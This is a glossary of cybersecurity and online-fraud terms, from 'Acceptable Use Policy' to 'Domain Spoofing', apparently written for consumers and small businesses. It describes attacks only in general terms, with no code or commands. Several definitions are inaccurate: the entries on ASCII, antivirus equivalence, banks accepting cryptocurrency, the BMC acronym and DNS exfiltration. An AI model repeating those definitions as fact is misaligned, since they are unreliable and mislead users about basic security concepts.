Acceptable Use Policy – This is a policy that defines the level of access and degree of use of the organization’s network or resource by the members of an organization or the general public. This is often applied to consumer products and in this context the AUP for your ISP might include that you can’t use the connection for business purposes.
Access Control List – This is a set of rules or instructions to inform an operating system about the access constraints for users or user groups, so that the operating systems knows whether or a user ID has permission to access a resource.
Access Point – This is a computer networking device which allows a Wi-Fi compliant device to connect to a wired network and usually connects via a router to an internal network or the Internet. An access point may also be implemented as part of your router or as a WiFi extender.
Access Profile – This is information about a user that is stored on a computer, including their password and name as well as what they are allowed access to. It will also provide information regarding access rights ad the type of access they might have to certain compute rsources.
Access Type and Rights – The type of access you have to a network, computing device or service will dictate what you can do with it. This might be classified as Administrative rights for high privilege access or more limited user level rights.
Active Security Testing – This is security testing which involves directly interacting with a target, such as sending packets, and interrogating them for malicious content.
Ad Fraud – This is concerned with theory and practice of fraudulently representing online advertisement impressions, clicks, conversion or data events in order to generate revenue. While ad fraud is more generally associated with banner ads, video ads and in-app ads. See also Click Fraud.
Adaptive security – This is a type of security mode that monitors threats continuously and improves as threats change and evolve. With traditional security methods, organizations use firewalls, intrusion defense systems (IDS), antivirus software, and intrusion prevention systems (IPS). In truth, while they are a powerful defense, they are no longer enough. Environments are no longer static, and security systems should be integrated within continuous deployment IT.
Advanced Encryption Standard (AES) – This is a specification for the encryption of electronic data established by the U.S. National Institute of Standards and Technology (NIST) in 2001. This is often deployed in WiFi networks, but can be used elsewhere.
Advanced Persistent Threat – This is a cyber attack that is long-term, highly targeted, and continuous. An APT attack is organized and has a central objective. Many advanced persistent threats are sponsored, usually by governments or rival competitors, and are aimed at stealing vital information from their targets. The objective of an APT attack could range from surveillance and stealing trade secrets to taking control of a network and completely disabling it.
Advanced Threat Protection – (ATP), is a type of security solution specifically designed to defend a network or system from sophisticated hacking or malware attacks that target sensitive data. ATP is usually available as a software or managed security service. Advanced Threat Protection solutions differ in terms of approach and components, but most include endpoint agents, email gateways, network devices, malware protection systems, and a centralized management console in order to manage defenses and correlate alerts.
Adware – This is not typically malware, but falls into a category of ‘Greyware’ and is typically unwanted software on your computer. This software will deliver adverts to your device (affects phones as well as PC’s) that often go full screen stopping you from using the application you are trying to use. They are often delivered though legitimate applications (see bloatware) as well as apps that masquerade as something you might want. Adware can also be malicious delivering malicious adverts that lure you into sites containing malware. It is often hard to get rid of these applications (see Bloatware and Greyware).
Air-Gapped System – this is a system/PC that is physically isolated from other systems. These systems will typically be disconnected from internal networks and often will be standalone systems or operating within a network that is physically disconnected from the main network of a company. Such systems are often used by security professionals to investigate malware to remove any chance of infecting other company systems.
Amazon Prime Scam – Victims receive an automated call telling them that someone has signed up for an Amazon Prime subscription on their account. They’re then told to press 1 on their phone keypad to cancel, at which point they’re transferred to the scammer, who collects their credit card details.
American Standard Code for Information Interchange (ASCII) – This is a a 7-bit character code where every single bit represents a unique character (more info here).
Anti-Virus Software – This is a software package you install on your device that protects you (within some limitations) against malware installing itself on your device. There are various vendors of this software, and they are all as good as each other in detecting malware. See also ‘Internet Security Software‘.
Anonymous Logon – See Null Session.
App-Attack – This is a form of cyber attack that occurs when a user unknowingly installs a harmful app on their device (Phone, PC) and the app in turn steals initiates some form of cyber attack (e.g. information stealing, activity monitoring, key logger, ransomware or other malware). See also Download Attack.
Asymmetric Key/Encryption – (public key) This is a security measure that uses two keys to ensure the confidentiality of a message. One key encrypts the message, while the other key decrypts it. See Public Key Encryption.
Attack Vector – This is any means by which attacker gains entry into the target system. This can involve social engineering, malware or exploitation of vulnerabilities.
Auction Fraud – This is where someone is selling something on an online auction site, such as eBay, that appears to be something it really isn’t. For example, someone may claim to be selling tickets for an upcoming concert that really are not official tickets.
Authentication – In the context of computers, this is the process of identifying a person or system with the username; password, etc. It proves the validity that a claimed identity (whether human or a resource) is real and legitimate. This can be enforced using several means, for example 2 factor authentication, CAPCHA.
Authorised Push Payment (APP) fraud – This is where criminals persuade victims to make a payment into their account by posing as a real organisation, or promising products that are never delivered.
Baiting – In the context of social engineering, this is an attack that uses physical media and relies on the curiosity, or greed, of the victim to lure them in to clicking on a link to a malicious website. This is likened to the concept of a ‘Trojan Horse’, but using electronic media. An example would be that you have an interest in motorcycles, so you receive an invite to a motorcycle event. The website you visit will then implant malware into your device.
Back Door – This is often something malware will install on a computer system that allows the attacker to gain privileged access to the computer system. These can also exist in systems due to programming mistakes (vulnerabilities, exploits), or by design so that the vendor, or the security services, can access to the system without often requesting access.
Backup – This a copy of your important data that is kept away from, and preferably on a separate device that is not connected to, the device that contains the original (or cloud storage). Preferably the device you backup to should not online and stored either in a separate location and/or in some form of fire safe (budget versions exist for consumers). See also our guidance on Backing up your data.
Baseline Security – This is the minimum set of security controls required for safeguarding an IT system. Baseline security is based upon a system’s identified needs for confidentiality, integrity and availability protection.
Biometrics – This is a security system, which takes into account the unique physiological characteristics of a person such as fingerprints, DNA, face, hair, etc., for identification and authentication purposes.
Black Box Attack – See Jackpotting Attack.
Black Core – This is a communication network architecture in which user data traversing a global internet protocol (IP) is end-to-end encrypted at the IP layer.
Black Hat Hacker – See also the definition of ‘Hacker’ and ‘White Hat Hacker’ below. This is typically a hacker where the intent is to utilise computer vulnerabilities to cause harm, or exercise some form of crime (e.g. extortion).
Blended Attack – This is a cyber attack with the intent of spreading malicious code.
Block Cypher – This is a method used to encrypt text or other information by encrypting data in blocks, strings, or group at a time rather encrypting individual bits.
Bloatware – This is typically software that is installed at the same time as a wanted application. For example, you install Adobe PDF reader, and the Chrome web browser installed by default unless you untick a checkbox during installation. This is often used as a mechanism to monetise free software, where the owner of the software hitching a ride pays the vendor to also carry this software. This mechanism can also be used to deliver malware, so you have to be cautions when installing software you download from untrusted websites sites. You will also often find bloatware installed on low priced PC’s and other devices (e.g. phones) as an attempt to deliver you a cheap product. Bloatware, same as greyware, is often difficult to remove, and in the case of Android based devices almost impossible unless you ‘root’ the device.
Blue Team – This is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and to make certain all security measures will continue to be effective after implementation. They will typically engage in:
- Defensive Security
- Infrastructure Protection
- Damage Control
- Incidence Response
- Operational Security
- Threat hunting and assessment
- Digital Forensics.
See also Red Team, who typically test the effectiveness of the blue team by emulating the behaviors of a real black-hat hack group, to make the attack as realistic as chaotic as possible to challenge both teams equally.
Bluetooth – This is a wireless technology standard used for exchanging data between fixed and mobile devices over short distances using short-wavelength UHF radio waves in the industrial, scientific and medical radio bands, from 2.400 to 2.485 GHz, and building personal area networks (PANs). It was originally conceived as a wireless alternative to RS-232 data cables.
Bluetooth Attacks – Bluetooth technologies (see above) can be compromised, among others, using the following methods:
- Blue Bugging
- Blue Jacking
- Blue Snarling
- Btle Jacking.
An explanation of these terms can be found on an info-graphic provided by
@SecurityGuill. These attack vectors often exploit other vulnerabilities in the target device and in the implementation of the Bluetooth technology on the device.
Border Gateway Protocol – (BGP) This is a core Internet protocol that is used to determine the route that data takes on the Internet. One of the issues associated with the protocol is that the possibility of hijacking exists. A basic example would be that traffic from a user in the United States would go through servers in Asia to access the New York Times website.
Bot Net – This is a network of computers (sometimes nothing more than a very small embedded IOT device) that is infected with a form of malware that is used to initial Distributed Denial of Service attacks. The owners of the individual devices forming the Bot net often have no idea they are infected. Internet of Things (IOT) devices that are unprotected by some form of authentication are among the most vulnerable.
Browser Fingerprinting – As browsers become increasingly entwined with the operating system, many unique details and preferences can be exposed through your browser. The sum total of these outputs can be used to render a unique “fingerprint” for tracking and identification purposes. Your browser fingerprint can reflect:
- the User agent header
- the Accept header
- the Connection header
- the Encoding header
- the Language header
- the list of plugins
- the platform
- the cookies preferences (allowed or not)
- the Do Not Track preferences (yes, no or not communicated)
- the timezone
- the screen resolution and its color depth
- the use of local storage
- the use of session storage
- a picture rendered with the HTML Canvas element
- a picture rendered with WebGL
- the presence of AdBlock
- the list of fonts.
Brute Force Attack – This is where a cyber attacker is trying to gain access to a computer system, but does not know the precise credentials to use. Therefore the attacker will try all combinations of credentials (e.g. user name/password combinations) to eventually come up with the right combination. The longer and more complex passwords are, the longer it takes for an attacker to come up with the right combination. This is typically automated.
Buffer Overflow – This is when a program tries to store an excess amount of data to a buffer exceeding the amount it has been designed to hold. As there is a limit on how much data a buffer can hold, the surplus data overflows to the adjoining buffers and memory locations thus, overwriting the data stored in those buffers, and triggering unpredictable consequences. This is a source of many vulnerabilities and is a characteristic of an oversight in programming.
Business Continuity Plan – This is also known as business emergency plan, it offers safeguards against a disaster, and outlines the strategies, action plan on how to continue business as usual in the event of any disaster. A disaster can be categorised by an environmental event (e.g. storms), power outages, earthquakes or cyber attack.
Business Email Compromise Attack – This is a form of cyber crime (abbreviated to BEC) which uses email fraud to attack commercial, Government and non-profit organizations to achieve a specific outcome which negatively impacts the targets organization. Examples of common BEC attacks include invoice scams and spear phishing spoof attacks which are designed to gather data for other criminal activities. Often consumer privacy breaches occur as a results of a BEC attack. See also Cyber Enabled Fraud and Invoice Scam.
Business Impact Assessment – This is the process of evaluating and identifying risks and threats that a business might face in the event of an accident, disaster, cyber attack or an emergency. It evaluates the possible risk to tangible and intangible assets such as personal, infrastructure, data and goodwill. In addition, it offers steps needed to recover from any such disasters.
Business Management Controller – (BMC) This is a hardware chip at the core of Intelligent Platform Management Interface (IPMI) utilities that allows sysadmins to remotely control and monitor a server without having to access the operating system or applications running on it. In other words, BMC is an out-of-band management system that allows admins to remotely reboot a device, analyze logs, install an operating system, and update the firmware—making it one of the most privileged components in enterprise technology today.
CAPTCHA – This is an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart“) is a type of challenge–response test used in computing to determine whether or not the user is human. It is often used as a challenge to weed out automated bot access to websites, but it is not fully fool proof and can be used to provide authenticity to a cyber attack.
Card Skimmer – These are devices that enable thieves to withdraw information from the magnetic strip of your credit/debit card when its casually used at an ATM or store.
Catfish Scam – This is where a person creates a fake online profile with the intention of deceiving someone. For example, a woman could create a fake profile on an online dating website, create a relationship with one or more people and then create a fake scenario that asks others for money. Another example is someone who creates a fake Facebook account that resembles a friend so that they can view a certain person’s private information.
CEO Fraud – This is when an employee authorized to make payments is tricked into paying a fake invoice or making an unauthorized transfer out of a business account. Typically this starts as an email from a senior official who requests an urgent payment is made. See also BEC/Business Email Compromise Attack.
Certificate – When used in the context of authentication, this is a form of digital identity for a computer, user or organisation to allow the authentication and secure exchange of information. Sometimes also called a Digital Certificate.
Certificate Authority – In cryptography, a certificate authority or certification authority (CA) is an entity that issues digital certificates. You can see this Wikipedia page for more details.
Chain Mail Scam – Sometimes called Chain Letter or Chain Email, is an unsolicited e-mail containing false information for the purpose of scaring, intimidating, or deceiving the recipient. Its purpose is to coerce the recipient to forward the e-mail to other unwilling recipients, thereby propagating the malicious or spurious message. They can often prey on the sympathy of an individual’s sympathy about a sick or dying relative, or a common myth or scare is sent out and because it seems significant or frightening, the recipient feels inclined to let all their friends know. This is also a method of spreading fake news.
Challenge Response Protocol – This is a kind of authentication protocol in which the verifier sends the claimant a challenge. This information is then verified to establish the claimant’s control of the secret. CAPTCHA is one such challenge.
Checksum – This is a numerical value that helps to check if the data transmitted is the same as the data stored and that the recipient has error free data. It is often the sum of the numerical values of bits of digital data stored, this value should match with the value at the recipients end, and a mismatch in the value indicates an error.
Chief Security Officer (CSO) – This is role of an executive of the company with assigned responsibility to protect assets such as the infrastructure, personnel, including information in digital and physical form. All companies need to assign a CSO, even if that person has multiple other roles.
Cipher – This is a mathematical algorithm that is used to encrypt data. There are many different ciphers that are used in various parts of the security landscape.
Cipher Text – This is data converted from plain text into encrypted code using algorithm, making it unreadable without the key.
Ciphony – This is the process of enciphering audio information with the result of encrypted speech.
Cleartext – This is data in ASCII format, or data that is not coded or encrypted. All applications and machines support plain text.
Click Fraud – This is the practice of clicking on paid ads with the sole intention of depleting or diverting the budget of the advertiser. It could be a disgruntled competitor who knows how much you pay per click and wants to hit you where it hurts (in the wallet), or it could be a shady network of criminals running multiple websites designed to channel those advertising dollars into their own accounts. This is often automated using bots.
Click Injection – This is a sophisticated form of click spamming. By publishing an app which listens to “install broadcasts,” it’s possible to detect when other apps are downloaded on a device. This enables fraudsters to trigger clicks before the install is complete. Without preventative tools in place, this means the fraudster will receive credit for the install.
Clickjacking – This is is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages. This is also classified as a User Interface Redress Attack, UI Redress Attack or UI Redressing.
Click Spam – This type of fraud happens when a fraudster executes a click for users who are none-the-wiser (in fact, it is unlikely that the user is even exposed to the ad). Click Spam is also known as organics poaching. See also Mobile Ad Fraud.
Cloud – This is typically referencing a set of software defined services that exist in a remote data centre. Such services are:
- Software as a service – where an application is hosted remotely (e.g. Office 365, Databases). This can also be a platform that can be configured/customised to deliver a service of your own design
- Platform as a Service – where the hosting provider provides a means to host your on servers in a virtual environment, which can come in managed and unmanaged forms.
- Storage as a Service – where the hosting provider provides storage for files remotely (e.g. One Drive, Google Drive) – see also Cloud Storage.
Cloud Computing – This is the delivery of computing services (including servers, storage, databases, networking, software, business analytics and intelligence) over the Internet (“the cloud”) to offer faster innovation, flexible resources and economies of scale. Typically, you only pay for cloud services you use, helping you lower your operating costs, run your infrastructure more efficiently and scale as your business needs change. See also Edge Computing.
Cloud Storage – This is a service offered by a service provided (e.g. Google, Microsoft, Amazon Web Services) that allows you to store a limited amount of files on their service as a form of backup or to allow you to access the files from multiple locations and devices. It is effectively your disk drive in the cloud. These services come in various capacities, an often come with a free allocation in the order of 5Gb. Any additional storage you add will be subject to a monthly subscription charge.
Cold Call Scam – This is where, for example, someone claiming to be from technical support from a computer company like Dell, saying they have received information that your computer is infected with a virus, or hacked. They offer to remotely connect to your computer and fix the problem. This typically involves some form of urgency and can be applied to different scenarios.
Cold Site – This is a is a backup facility ready to receive computer equipment should it need to move to an alternate location. This site should be able to become operational fairly quickly, usually in one or two days.
Common Attack Pattern Enumeration and Classification – This is a document published by MITRE Corporation that details how vulnerable systems are attacked. The community-developed document describes common attack patterns and how such attacks are executed.
Compartmentalization -This is a technique of protecting confidential information by revealing it only to a few people, to those who actually need to know the details to perform their job. Thus, by restricting access to information, data the risk to business objectives is limited.
Computer Emergency Response Team (CERT) – This is a team formed to study the vulnerabilities of information systems of an organization and offer solutions and strategies to face such vulnerabilities. Such teams are highly organized with clearly defined roles and responsibilities.
Computer software service Fraud – The fraudster will ask for remote access to the victim’s computer to fix a virus or other issue, then they search the device for the victim’s financial details. In this scam the victim is targeted via phone, email or pop-up ad.
Computer Forensics – This is the process of analysing computer devices on suspecting that such devices may have been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law.
Consent Phishing – This is where cyber attackers trick users into granting a malicious app access to sensitive data or other resources. Instead of trying to steal the user’s password, an attacker is seeking permission for an attacker-controlled app to access valuable data.
Content Filtering – This is a process by which access to certain content, information and data is restricted, limited, or completely blocked based on organization’s rules.
Cookie – (often also called web cookie, Internet cookie or browser cookie) This is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user’s browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers. There are various types of Cookie currently in use:
- Session Cookie (normally only valid while the browser is running and lost when the browser closes)
- Persistent Cookie (stored to disk and can be retrieved in a future browser session)
- Secure Cookie (transmitted only over secure connections)
- Third Party Cookie (a cookie that is sourced from a different domain that the source of the website being browsed)
- Zombie Cookie ( a cookie that is automatically recreated after being deleted).
Cookie Stuffing – This is a technique where a website or browser extension adds extra information to a user’s cookie. The technique is often used in affiliate marketing to hijack traffic from its legitimate source. As a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target. Because the stuffer has not actually encouraged the user to visit the target, this technique is considered illegitimate by many affiliate schemes.
Courier Fraud – This is when a fraudster contacts victims by telephone purporting to be a police officer or bank official. To substantiate this claim, the caller might be able to confirm some easily obtainable basic details about the victim such as their full name and address. The caller may also offer a telephone number for the victim to telephone or ask the victim to call the number on the back of their bank card to check that they are genuine. In these circumstances, either the number offered will not be genuine or, where a genuine number is suggested, the fraudster will stay on the line and pass the victim to a different individual.
Cousin Domain – This is also referred to as a look-alike domain, is a Domain Name System (DNS) domain that looks similar to another name when rendered by a Mail User Agent (MUA) or a web browser. For example, groupA.example is a cousin domain of group.example. Other examples include misspellings of a domain returnpaht.com and returpath.com
Countermeasure – This is a defensive mechanism that helps mitigate risk, threat, to a network or computers, using a process, system or a device. Such a countermeasure would be an anti-virus solution or a firewall.
Credential Stuffing – This is where a cyber attacker will attempt to gain access to a computer system (e.g. your favourite shopping website) using information often gained in data breaches. The attacker will typically try previously disclosed credentials en-mass to try to gain access. This is also typically automated, resulting in thousands of credentials being tried in a very short time. See also my blogs on Effective use of Passwords and Bot Based Credential Stuffing.
Critical Infrastructure – This is the fundamental system of an organization that is important for its survival, any threat to such basic systems would push the entire organization in to jeopardy. This term is also used to describe critical services for a country, such as the electricity supply and communications infrastructure. In this context a typical cyber warfare tactic would be to disable a countries critical infrastructure to render is incapable of responding to other more physical attacks and invasion.
Cross Site Scripting Attack – Cross-Site Scripting (XSS) attacks occur when:
- Data enters a Web application through an untrusted source, most frequently a web request.
- The data is included in dynamic content that is sent to a web user without being validated for malicious content.
Cross Site Request Forgery Attack – (CSRF) This is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Crowdfunding scams – See Donation Scam.
Cryptography – This is the science of protecting the privacy of information by encrypting it into a secret code, so no one but the authorized person with an encryption key can read or view the information. These techniques are widely used in WiFi and encrypting data while in transit and at rest.
Cryptocurrency – This is a form of electronic currency that uses cryptography for security. Typically a cryptocurrency is a decentralised commodity that is managed using the Block Chain technology, which is a distributed ledger of all transactions in the cryptocurrency. Most banks will now accept payments in cryptocurrencies. Cryptocurrency if often used to pay ransoms resulting from Ransomware attacks and other illegal activities on the dark web. However dealing in cryptocurrency is totally legal in most countries. Cryptocurrencies you may have heard about are:
- Bitcoin (the first and most known one)
Cryptojacking – This is an online threat that hides on a computer or mobile device and uses the machine’s resources to “mine” forms of cryptocurrencies. It can take over web browsers, as well as compromise all kinds of devices, from desktops and laptops, to smart phones and even network servers. Like most other malicious attacks, the motive is profit, but unlike many threats it’s designed to stay completely hidden from the user and often uses tactics to detect when the system is idle (i.e. not actively in use) so as to mask its activity.
Cryptocurrency Mining – This is the computational process whereby transactions in Cryptocurrency are verified and entered into the distributed ledger called the Blockchain. For more info on this, see this Forbes Article.
Cyber Attack – This is any attempt to expose, alter, disable, destroy, steal or gain unauthorized access to or make unauthorized use of a computer system. There are various forms of Cyber Attack, and the following list is just examples
- Brute Force Attack/Dictionary Attack
- Business Email Promise Attack
- Click Jacking
- Cookie Stuffing
- Credential Stuffing
- Data Breaches
- Denial of Service (DoS)
- Distributed Denial of Service (DDoS)
- DLL Hijacking
- Elevation of Privilege
- Keystroke Logging
- Social Engineering
Modern cyber attacks often don’t just rely on one attack vector. They will often chain various vulnerabilities and attack vectors to achieve its goal.
Cyber Attack Vector – This is loosely the method by which a cyber criminal uses to attack their victim. Social Engineering is such an example of a Cyber Attack Vector, but there are many others that a hacker can use to exploit vulnerabilities in the computer system they are attacking.
Cyber-Enabled Fraud – This is often refered to an Business Email Compromise (BEC) and is defined as a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that regularly preform payments, including cross border payments. These scams have evolved to also target Personal Identifiable Information (PII) for employees of clients. These scams can also target individuals (e.g. real-estate purchasers, the elderly) by convincing them to make payments to bank accounts controlled by criminals.
See also Fraud and Business Email Compromise Attack and Social Engineering.
Cyber Espionage – This is spying on the computer systems of an organization with the help of a virus, or other malware, to steal or destroy data, information. This is often done as a part of industrial espionage as well as nation state espionage.
Cyber Incident – This is a breach of the security rules for a system or service.For example:
- Data Breach
- Unauthorised Access to a system
- Infiltration by Malware, Ransomware, Crypto Miners, etc.
- Changes to system firmware, operating systems or application software
- Disruption and/or Denial of Service
Cyber Squatting – This is registering, trafficking in, or using an Internet domain name with bad faith intent to profit from the goodwill of a trademark belonging to someone else. The cybersquatter then offers to sell the domain to the person or company who owns a trademark contained within the name at an inflated price. See also Domain Typo Squatting
Cyber Security Incident Response Team (CSIRT) – A cyber security incident response team (CSIRT) consists of the people who will handle the response to an incident (e.g. a data breach, ransomware attack). It may include both internal and external teams and may differ based on the nature of the incident. The core team will usually be IT or Cyber Security specialists. The extended team may include other capabilities, such as PR, HR and legal. The team does not have to be full time. It is more cost effective to have a ‘virtual’ CSIRT, pulled together when needed, from people who have other day jobs.
Cyber War Games – This allows executives and employees to practice their response to simulated crises caused by hacks or malware. Typically a team within an organisation will think like attackers and imagine doomsday scenarios that could cripple the organisation and its ability to function. Scenarios are fictitious, but realistic, and based on the latest threat intelligence about what “bad actors” are up to. War games are an opportunity to be proactive and simulate high-pressure situations, so that an organisation is not caught off guard in the middle of a crisis.
Data Asset – This is any entity that is comprised of data; for example, a database, file, document, a system or application output file, Web page Data assets can also be a service that may be provided to access data from an application.
Data At Rest – This describes data in persistent storage such as hard disks, removable media or backups. Data at rest can be in an encrypted form (prefered) or unencrypted.
Data Breach – This is where a cyber attacker has gained access to a cache of information (typically an unsecured database of some form) and extracts private information. This could typically be user names, passwords, postal addresses, credit card numbers, medical records among many others. The purpose of data breaches is to gain access to private information so that it can be exploited in other cyber attacks, for example social engineering, credential stuffing.
Data Classification – This is a data management process that involves categorizing and organizing data into different classes based on their forms, types, importance, sensitivity, and usage in an organization.
Data Custodian – This is typically an executive of an organization entrusted with the responsibilities of data administration, as such protecting and safeguarding data is the primary responsibility of Data custodian.
Data Encryption Standard – This is a form of algorithm to convert plain text to a cipher text.
Data in Transit – This describes data that is being moved from one storage to anther or for use in a processing application. Data in Transit should be encrypted using HTTPS or other encryption technologies.
Data Leakage – This is the unauthorized transmission of data from within an organization to an external destination or recipient. The term can be used to describe data that is transferred electronically or physically. Data leakage threats usually occur via the web and email, but can also occur via mobile data storage devices such as optical media, USB keys, and laptops.
Data Owner – This is an executive of an organization entrusted with the administrative control of the data. Such individual or executive has complete control over data, and he can control or limit the access of such data to people, assign permissions, etc., also he is accountable for such data accuracy and integrity.
Data Retention – This is the process of storing and protecting data for historical reasons and for data back up when needed. Every organization has its own rules governing data retention within the organization.
Data Retention Period – This is the period for which data is required to be retained and can be dictated by regulations (e.g. GDPR) as well as other regulatory bodies (e.g. FSA in financial services in the UK). Once data has exceeded its data retention period it should be irretrievably destroyed.
Debt Collection Scam – Scammers can call people threatening them and telling them about a debt they owe telling them that f they don’t pay immediatelly they will be prosecuted or suffer bailiffs to recover the debt. In most cases this is a non-existant debt.
Decryption – This is the opposite of Encryption (see below) where a recipient of an encrypted message can use the same algorithm used to encrypt it to decrypt it.
Decryption Key – This is an token that is known to one, or both parties in an encrypted exchange which is used in decrypting an encrypted message or device.
Deepfake – A combination of the terms “deep learning” and “fake” — are persuasive-looking but false video and audio files. Made using cutting-edge and relatively accessible AI technology, they purport to show a real person doing or saying something they did not. This is of particular concern when used to distribute fake news and/or disinformation especially in a political election. See our guidance on Deep Fakes.
Defence in Depth – This is the process of creating multiple layers of security to protect electronics and information resources against attackers. Also called the Castle approach, it is based on the principle that in the event of an attack, even if one layer fails to protect the information resource other layers can offer defence against the attack.
Demultiplexing – The reverse process of Multiplexing.
Denial of Service (DoS) – This is a form of cyber attack that attempts to take legitimate services (e.g. game sites, shopping sites) offline by flooding them with requests. The flood of requests is so great that the host systems cannot cope with the inbound traffic, and either slow to a halt or crash totally. Think of this as being in a crowded/noisy room and you are trying to hear someone talking to you where even if they are shouting you cannot hear them. This form of attack is often perpetrated by criminals out to either destroy, or at the very least disrupt a service.
DevOps – This is a set of software development practices that combine software development (Dev) and information technology operations (Ops) to shorten the systems development life cycle while delivering features, fixes, and updates frequently in close alignment with business objectives.
Dictionary Attack – This is a more refined form of Brute Force Attack (see above) where the attacker uses words and known substitution patterns to gain crack a password so as to gain access to a computer system. This is in contrast to a phrase attack.
Digital Certificate – This is a piece of information that guarantees that the sender is verified, genuine and that he is the person who he claims to be. Otherwise known as Public Key Information, Digital certificate issued by Certificate Authority, helps exchange information over the internet in a safe and secure manner.
Digital Footprint – This is the traces of information left behind by a persons online activity. This can consist of Cookies, tracking information, payments, web searches, location information to name a few.
Digital Forensics – This is a branch of forensic science (sometimes known as digital forensic science) encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime.
Digital Signature – This is an electronic code that guarantees the authenticity of the sender of information as who he claims to be, and that the information he sent out is first- hand, without any alterations. Digital signatures use the private key information of the sender and cannot be imitated or forged, easily.
Directory Traversal Vulnerability – This kind of bug can allow a malicious attacker to upload and plant files on a system in unexpected system locations. If the attacker can fine-tune the attack, he can control the places where the malicious files can end up. There are several locations on a Windows or Linux system where the uploaded files could be executed automatically, leading to a situation where the attacker could run malicious code and take over vulnerable servers entirely.
Disaster Recovery Plan (DRP) – Sometimes called Business Continuity Plan (BCP) prescribes the steps required to carry on the business as usual in the event of a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in-depth study and analysis of business critical processes and their continuity needs. Business continuity plans also prescribe preventive measures to avoid disasters in the first place.
Discretionary Access Control – This is a security measure, by which the owner can restrict the access of the resources such as files, devices, directories to specific users or user groups based on their identity. It is the discretion of owner to grant permit or restrict users from accessing the resources completely or partially.
Distributed Denial of Service (DDoS) – This is an evolution of a Denial of Service attack where the source of the traffic flooding a website is coming from multiple sources. DDoS attacks can happen in two primary ways:
- Where specially crafted data is sent to a sever that is is not set up to handle, and therefore crashes or goes into an endless processing loop
- Flooding, where too much data/requests are sent to a server which slows it down so that it cannot process legitimate requests, or even crashes under the load.
Domain Typo Squatting – This is a form of cybersquatting which relies on mistakes such as typographical errors made by Internet users when inputting a website address into a web browser. See our guidance on Domain Typo Squatting. Also known as URL hijacking. See also Cyber Squatting
Domain Name Service (DNS) – This is essentially a phone book for the internet. You will type in an address for a website (e.g. https://www.imdb.com) and the DNS service that is used by your computer translates that into a physical address (IP address similar to 192.168.25.246) that can be used by your web browser to access the website. In accessing a web page your browser makes many (sometimes as many as a 100 or more) requests to access resources on the internet ranging from the actual content you want to see to structural entities you will never see as well as Ads, graphics, videos and download items. DNS queries are typically accessed over an un-encrypted protocol (UDP) that is open for anyone to see even if the website you are accessing is encrypted (https). There is a very good Wikipedia article describing what DNS is at a more technical level.
Domain Name System (DNS) Exfiltration – This is a difficult to detect lower level cyber attack on DNS servers to gain unauthorized access.
DNS over HTTPS (DoH) – This is a secure means to execute DNS queries instead of the insecure and un-encrypted protocol used today (UDP), DNS queries are encoded over HTTPS and are therefore encrypted.
DNS Rebinding Attack – As part of accessing a website, your web browser will to a Doman Name lookup to translate the textual URL (for example https://jmbusinesssecurity.co.uk/) to an IP Address like 188.8.131.52 (IP v4). The IPA address is bound to the website you want to go to via the DNS Service you are using. In a DNS Rebinding Attack, malware residing on the network, or possibly in your router, intercepts this request and then assigns a different IP address that redirects you to the cyber criminals malicious site. This is why HTTPS is so imprtant since this will also require certificates to line up. Secure DNS will also mitigate this since most DNS queries occur using an unencrypted service.
DNS over TLS (DoT) – This is a protocol for encrypting and wrapping DNS queries and their replies in TLS (Transport Layer Security). This offers both privacy via TLS encryption and authentication via TLS support for the entire public key infrastructure. So this prevents eavesdropping and any manipulation of DNS data via man-in-the-middle attacks.
DNSSec – This provides cryptographically signed DNS records which allows a DNSsec-aware Operating System (e.g. Windows, MacOS, Android) to verify that the DNS response received has not been tampered with or altered in any way. Since the DNS reply is signed with a private key which no forger can have, this means that the received DNS reply is authentic. However, DNSSec on its own does NOT encrypt and anyone watching the traffic will see the DNS client’s queries and their replies just as if DNSSec was not in use. If you want to learn more about DNSSec in Windows then please look at this Microsoft blog on the subject (from Windows 7 onward, windows was DNSSec aware, but your actual DNS service might not be – take a look at this resource and test your setup).
Domain-based Message Authentication, Reporting & Conformance (DMARC) – This is an authentication protocol where an email sender’s identity using DKIM (DomainKeys Identified Mail) and SPF (Sender Policy Framework) standards. DMARC users also set a policy for what should happen to emails that don’t pass the validation. “Reject” is the strongest setting, which blocks suspicious emails, or users can instead request “quarantine,” which sends dubious message into a spam or junk mailbox. (“None” is the third option, which results in no action taken.)
DomainKeys Identified Mail (DKIM) – This is an email authentication method designed to detect forged sender addresses in emails. DKIM allows the receiver to check that an email claimed to have come from a specific domain was indeed authorized by the owner of that domain. It achieves this by affixing a digital signature, linked to a domain name, to each outgoing email message. The recipient system can verify this by looking up the sender’s public key published in the Domain Name Server (DNS). A valid signature also guarantees that some parts of the email (possibly including attachments) have not been modified since the signature was affixed. Usually, DKIM signatures are not visible to end-users, and are affixed or verified by the infrastructure rather than the message’s authors and recipients.
Domain Spoofing – This is a common form of phishing and occurs when an attacker appears to use a company’s domain to impersonate a company or one of its employees. This can be done by sending emails with false domain names which appear legitimate, or by setting up websites with slightly altered characters that read as correct. Commonly, a spoof website or email will use logos, or any other kind of accurate visual design to effectively imitate the styling and branding of a legitimate enterprise or business. Users will commonly be prompted to enter financial details or other sensitive data, trusting that they are being sent to the right place. Domain Spoofing Classifications are:
- Email Spoofing
- Website Spoofing.
It is recommend that users only access financial sites and other sensitive sites directly through a main page or other verified avenue in order to avoid being cheated by a spoof website.
